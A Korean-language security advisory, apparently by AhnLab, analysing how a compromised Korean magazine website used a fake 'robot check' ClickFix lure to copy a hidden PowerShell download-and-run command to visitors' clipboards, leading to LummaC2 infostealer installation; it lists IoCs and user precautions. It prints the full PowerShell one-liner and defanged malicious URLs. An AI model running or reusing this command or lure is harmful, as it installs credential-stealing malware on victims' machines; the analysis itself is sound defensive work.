국내 매거진 사이트 악용, '로봇 확인' 클릭 시 악성코드 설치
국내 한 큐레이션 매거진 사이트가 악성코드 유포 경로로 악용되며 사용자 주의가 요구되고 있다. 공격자는 웹페이지에 악성 스크립트를 삽입하고, ‘로봇 확인(CAPTCHA)’처럼 보이는 ClickFix 기법으로 사용자의 클릭을 유도했다. 이 과정에서 클립보드에 복사된 파워셸(Powershell) 명령을 실행하도록 속여 최종적으로 인포스틸러 악성코드 ‘LummaC2’를 설치한다. 이번 사례를 통해 ClickFix 기반 LummaC2 유포 방식과 대응 방안을 살펴보자.

안랩은 최근 국내 패션·컬처·라이프·에디토리얼 등의 주제를 제공하는 큐레이션 매거진 사이트에서 ClickFix 기법을 활용한 LummaC2 악성코드 유포 정황을 확인했다.

[그림 1] 큐레이션 매거진 사이트
공격자는 해당 웹페이지의 파일들을 감염시켜 [그림 2]와 같이 eval 함수를 통해 악성 명령을 실행하는 코드를 삽입한 것으로 추정된다. eval 명령이 실행되면 리다이렉트를 거쳐 ClickFix 동작을 수행하는 JavaScript(자바스크립트) 악성코드가 실행된다.

[그림 2] 삽입된 eval 함수
- hxxps://gatepass-corp[.]com
- hxxps://gatepass-corp[.]com/atptfeptvhakjsvfel

[그림 3] ClickFix 기법을 담당하는 루틴
1. ClickFix 기법
ClickFix는 2024년 중반 처음 보고된 신종 사회공학 기반 악성코드 유포 방식이다. 공격자는 ‘로봇 확인’ 버튼처럼 보이는 화면을 제시해 사용자의 클릭을 유도한다.
이 과정에서 공격자는 클릭 시에만 클립보드 접근을 허용하는 자바스크립트 기능을 악용하며 사용자가 해당 버튼을 클릭하는 순간, 악성 명령어가 PC 클립보드에 자동으로 복사된다. 이후 공격자는 해당 명령을 직접 실행하도록 안내한다. 사용자가 이를 실행할 경우 악성코드 감염이 진행된다.
[그림 4] 악성 명령 실행을 유도하는 ClickFix 기법
클립보드에 복사된 명령은 파워셸을 통해 추가 페이로드를 다운로드실행하는 기능을 수행한다.
> powershell -w h -c "$a=[System.Net.HttpWebRequest]::Create('hxxp://gatepass-corp[.]com/toljhnxgvhcsfduwzf');$b=$a.GetResponse();$c=$b.GetResponseStream();$d=New-Object System.IO.StreamReader $c;$e=$d.ReadToEnd();$d.Close();$c.Close();$b.Close();iex $e"
다운로드된 파워셸 스크립트는 난독화돼 있으며, 복호화 시 [그림 5]와 같이 Windows Defender를 비활성화하고 %TEMP% 경로에 추가 페이로드를 다운로드하는 동작을 수행한다.

[그림 5] 추가 페이로드 다운로드 루틴
2. LummaC2
분석 시점 기준 다운로드 주소 문자열이 일부 훼손돼 정상 다운로드는 불가능하지만, 실제 의도된 주소는 다음과 같은 것으로 추정되며 해당 경로에서는 실행 파일 다운로드가 가능하다.
- hxxps://venomi[.]nl/fotografie/wp-includes/certificates/Z1Classic.exe
최종적으로 다운로드돼 실행되는 악성코드는 LummaC2로 확인됐다. LummaC2는 C&C 서버로부터 설정 데이터를 수신해 정보 탈취를 수행하는 인포스틸러 악성코드다. 설정 값에 따라 다양한 자격 증명 정보, 웹 브라우저 확장, 지갑 파일 등 민감 정보가 탈취될 수 있다.
3. 대응 방안
- 의심스러운 팝업 또는 로봇 확인 화면이 나타나면 클릭하지 말고 즉시 브라우저를 종료하거나 이전 페이지로 이동
- 웹사이트에서 명령어 실행 요구 시 절대 실행하지 말고 해당 페이지 접속 중단
4. IoC
|
Type |
MD5 |
Path |
C&C |
Download |
|
Redirect |
N/A |
N/A |
hxxps://gatepass-corp[.]com |
|
|
Redirect |
N/A |
N/A |
hxxps://gatepass-corp[.]com/atptfeptvhakjsvfel |
hxxps://gatepass-corp[.]com |
|
ClickFix Script |
9965ba6ce10bacc13a6d093ff005a52d |
N/A |
hxxp://gatepass-corp[.]com/toljhnxgvhcsfduwzf |
hxxps://gatepass-corp[.]com/atptfeptvhakjsvfel |
|
Downloader |
2782f77b60067cdbc1fceab745cc28c7 |
N/A |
hxxps://venomi[.]nl/fotografie/wp-includes/certificates/Z1Classic.exe |
hxxp://gatepass-corp[.]com/toljhnxgvhcsfduwzf |
|
LummaC2 |
499d1cd1ab4ecf28c23056474016ae5d |
%TEMP%\[random].exe |
hxxps://salivae[.]cyou/ hxxps://whitepepper[.]su/asds hxxps://hammernew[.]su/asdase hxxps://heavylussy[.]su/ccvfd hxxps://broguenko[.]su/asfase hxxps://homuncloud[.]su/ascasef hxxps://familyriwo[.]su/fssdaw hxxps://izzardtow[.]su/cascasc hxxps://basilicros[.]su/asdasq hxxps://steamcommunity[.]com/profiles/76561199880317058 |
hxxps://venomi[.]nl/fotografie/wp-includes/certificates/Z1Classic.exe |
- AhnLab콘텐츠마케팅팀